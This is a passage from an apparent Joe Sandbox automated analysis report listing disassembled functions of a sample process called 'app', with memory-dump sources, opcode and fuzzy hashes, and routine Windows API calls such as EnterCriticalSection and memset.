                                                                                                                                                                                                            • Instruction ID: 5af3070ae9f73b8cbe859d335dd3950382c75a915003935411503019f43da48a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d2cda625ecda15897edb9eef5b6e62eac8eb8e1ea5ba14afa43ae81a5d77a6f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD612432B0A781A5EF20DE22E4007AA6690FB41BD8F808631DE9D47BC5CFBCD551CB18
                                                                                                                                                                                                            Function 00007FF8A8011390 Relevance: 5.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 4439dcfe1e53bdca136c05150011155c9fdba703037600100ec97afc304ffcbb
                                                                                                                                                                                                            • Instruction ID: 4ec4acffd40596297a70b1941929c15d2cac9c2addca9262a975488ed1807103
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4439dcfe1e53bdca136c05150011155c9fdba703037600100ec97afc304ffcbb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D219166A0AE81D6EF598B116544379A360EF54FE4F091230DE9E07BC8DF7CE0918324
                                                                                                                                                                                                            Function 00007FF8A801DED0 Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2978645861-0
                                                                                                                                                                                                            • Opcode ID: 150c4656a47f38e5ccce39b355e46d8cd4472254d8fd33331cf48b4ec0c25841
                                                                                                                                                                                                            • Instruction ID: 6c2058b83ef7f2c342e5deba519034f6aeb823a48e489bf7e8324e5367eaea6d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 150c4656a47f38e5ccce39b355e46d8cd4472254d8fd33331cf48b4ec0c25841
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14219122B19B4992EE258F39A140169A3A0FF9D7D4F084234EF4D17B95EF3CE1A18A44
                                                                                                                                                                                                            Function 00007FF8A801E300 Relevance: 5.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2978645861-0
                                                                                                                                                                                                            • Opcode ID: 5640bd2e6dc98826bf1ce9365b6b1eab4a17301b2bc14b67ba68f7efca0c49f6
                                                                                                                                                                                                            • Instruction ID: 086c66aa2bd8ba35192ac147096fffecc7c6af536edd0d15ab903a6e2f24081e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5640bd2e6dc98826bf1ce9365b6b1eab4a17301b2bc14b67ba68f7efca0c49f6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC11AC72A09F84C2DB518F28F14126D63B0FB98BC4F059220DA9D06759DF3CE5E08B04
                                                                                                                                                                                                            Function 00007FF8A801E4F0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00007FF8A801ADF2), ref: 00007FF8A801E506
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00007FF8A801ADF2), ref: 00007FF8A801E528
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00007FF8A801ADF2), ref: 00007FF8A801E539
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2978645861-0
                                                                                                                                                                                                            • Opcode ID: dbc27f841242c765fe9cf9dbf3fe19fbbbeb4880370c8695facdf93adbdb6cbb
                                                                                                                                                                                                            • Instruction ID: 99670add6ad7040be1f01596a4f6531731a804f42acdac9d61de1a097be81fde
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbc27f841242c765fe9cf9dbf3fe19fbbbeb4880370c8695facdf93adbdb6cbb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30114CA2A0AA44D6EF418F69E5413796360FF58BD8F099130DB4E06399EF3CD5E18744
                                                                                                                                                                                                            Function 00007FF8A817D240 Relevance: 5.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2221118986-0
                                                                                                                                                                                                            • Opcode ID: 8d48e656ba65cc08b65a5bc2c58627c2578cc7fd1d559890be9757c159fa36cf
                                                                                                                                                                                                            • Instruction ID: 0e6444ac67c211f3cfea48f2452cdbac2f8b52c3313a80fa3f7476178e1a702e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d48e656ba65cc08b65a5bc2c58627c2578cc7fd1d559890be9757c159fa36cf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB010861B0564651F759A60BD424BA92B11EF80BC0F088438EF4E0774EDF3ED583CB08